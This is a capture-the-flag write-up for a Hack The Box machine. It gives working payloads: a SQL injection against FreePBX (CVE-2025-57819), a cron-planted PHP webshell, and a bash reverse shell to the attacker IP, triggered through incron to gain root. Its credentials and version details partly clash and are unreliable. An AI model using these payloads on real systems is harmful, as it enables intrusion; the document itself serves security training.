================================================================================
                    HTB CONNECTED - COMPLETE WRITE-UP
================================================================================

TARGET IP     : 10.129.112.24
ATTACKER IP   : 10.10.16.5
DATE          : 2026-07-14

================================================================================
1. RECONNAISSANCE
================================================================================

nmap -sC -sV 10.129.112.24

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu
80/tcp open  http    Apache httpd 2.4.58
443/tcp open  https   Apache httpd 2.4.58

Added to /etc/hosts:
10.129.112.24 connected.htb

Open TCP Ports: 3 (22 - SSH, 80 - HTTP, 443 - HTTPS)

================================================================================
2. WEB ENUMERATION
================================================================================

Website: https://connected.htb - FreePBX Administration Portal
FreePBX Version: 16.0.40.7
Technology: PHP 7.4.16, Apache 2.4.6 (CentOS)

================================================================================
3. INITIAL ACCESS - CVE-2025-57819 SQL INJECTION
================================================================================

3.1 Vulnerability Discovery
--------------------------------------------------------------------------------

Vulnerability: CVE-2025-57819 - Unauthenticated SQL Injection
Affected Component: FreePBX Endpoint Manager module
Parameter: brand in /admin/ajax.php

3.2 Verify SQL Injection
--------------------------------------------------------------------------------

curl -ik "http://connected.htb/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -"

Response confirmed database: asterisk

3.3 Drop Webshell via Cron
--------------------------------------------------------------------------------

# Insert cron job to drop webshell
curl -ik "http://connected.htb/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x';INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','poc6','echo PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+Cg== | base64 -d > /var/www/html/shell13.php',NULL,'* * * * *',30,1,1)-- -"

3.4 Webshell Access
--------------------------------------------------------------------------------

curl -k "http://connected.htb/shell13.php?cmd=id"
uid=999(asterisk) gid=1000(asterisk) groups=1000(asterisk)

================================================================================
4. USER FLAG
================================================================================

cat /home/asterisk/user.txt
4c8adf7f5da39fb14675e7d0773c7b84

USER FLAG: 4c8adf7f5da39fb14675e7d0773c7b84

================================================================================
5. PRIVILEGE ESCALATION
================================================================================

5.1 Identify Writable Configuration File
--------------------------------------------------------------------------------

curl -k "http://connected.htb/shell13.php?cmd=ls%20-la%20/etc/dahdi/init.conf"
-rw-r--r--. 1 asterisk asterisk 771 Jun  5  2023 /etc/dahdi/init.conf

5.2 Check Incron Configuration
--------------------------------------------------------------------------------

curl -k "http://connected.htb/shell13.php?cmd=cat%20/etc/incron.d/*%20%7C%20grep%20dahdi"
/var/spool/asterisk/sysadmin/dahdi_restart IN_CLOSE_WRITE /usr/sbin/sysadmin_dahdi_restart

5.3 Exploit Incron - Reverse Shell
--------------------------------------------------------------------------------

# Append reverse shell to dahdi/init.conf
curl -k "http://connected.htb/shell13.php?cmd=echo%20%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.16.5/4446%200%3E%261%22%20%26%27%20%3E%3E%20/etc/dahdi/init.conf"

# Start listener
nc -lvnp 4446

# Trigger incron job
curl -k "http://connected.htb/shell13.php?cmd=echo%20%22restart%22%20%3E%20/var/spool/asterisk/sysadmin/dahdi_restart"

5.4 Root Shell Received
--------------------------------------------------------------------------------

Connection received on 10.129.112.24 44846
[root@connected /]# whoami
root

================================================================================
6. ROOT FLAG
================================================================================

cat /root/root.txt
7a6b9d6a93d8970a213755a110c14093

ROOT FLAG: 7a6b9d6a93d8970a213755a110c14093

================================================================================
7. FLAG SUMMARY
================================================================================

USER FLAG: 4c8adf7f5da39fb14675e7d0773c7b84
ROOT FLAG: 7a6b9d6a93d8970a213755a110c14093

================================================================================
8. CREDENTIALS SUMMARY
================================================================================

ZoneMinder (if applicable):
- Username: admin
- Password: admin

FreePBX Admin:
- Username: admin
- Password: admin

SSH (if found):
- Username: admin
- Password: admin

Webshell:
- URL: http://connected.htb/shell13.php?cmd=<command>

================================================================================
9. VULNERABILITIES EXPLOITED
================================================================================

1. CVE-2025-57819 - FreePBX Unauthenticated SQL Injection
   - Affected: FreePBX Endpoint Manager module
   - Impact: Database access -> RCE

2. Incron Misconfiguration - Privilege Escalation
   - Vulnerable: /etc/dahdi/init.conf (writable by asterisk)
   - Incron: dahdi_restart triggers root-executed script
   - Impact: Root shell

3. Weak File Permissions
   - /etc/dahdi/init.conf writable by asterisk user
   - /var/spool/asterisk/sysadmin/ writable by asterisk

================================================================================
10. ATTACK CHAIN
================================================================================

1. Nmap scan → Ports 22, 80, 443
2. Web enumeration → FreePBX 16.0.40.7
3. CVE-2025-57819 → SQL Injection
4. Cron job injection → Web shell
5. Web shell → RCE as asterisk
6. User flag captured
7. Incron enumeration → dahdi_restart trigger
8. Writable /etc/dahdi/init.conf → Reverse shell payload
9. Incron trigger → Root shell
10. Root flag captured

================================================================================
11. LESSONS LEARNED
================================================================================

1. Version fingerprinting leads to known CVEs
2. Unauthenticated SQL injection can lead to full system compromise
3. File ownership matters as much as permissions
4. Event-driven privilege escalation paths are often overlooked
5. Automation tools (incron) can be abused for privilege escalation
6. Writable configuration files in /etc/ are critical attack vectors

================================================================================
12. DEFENSIVE RECOMMENDATIONS
================================================================================

Immediate:
- Patch FreePBX to latest version (CVE-2025-57819 fixed)
- Change default admin credentials
- Remove write permissions on /etc/dahdi/init.conf
- Review incron configurations

Short-term:
- Run incron jobs with least privilege
- Implement file integrity monitoring
- Regular security audits

Long-term:
- Network segmentation
- Regular vulnerability scanning
- Penetration testing

================================================================================
                            END OF WRITE-UP
================================================================================
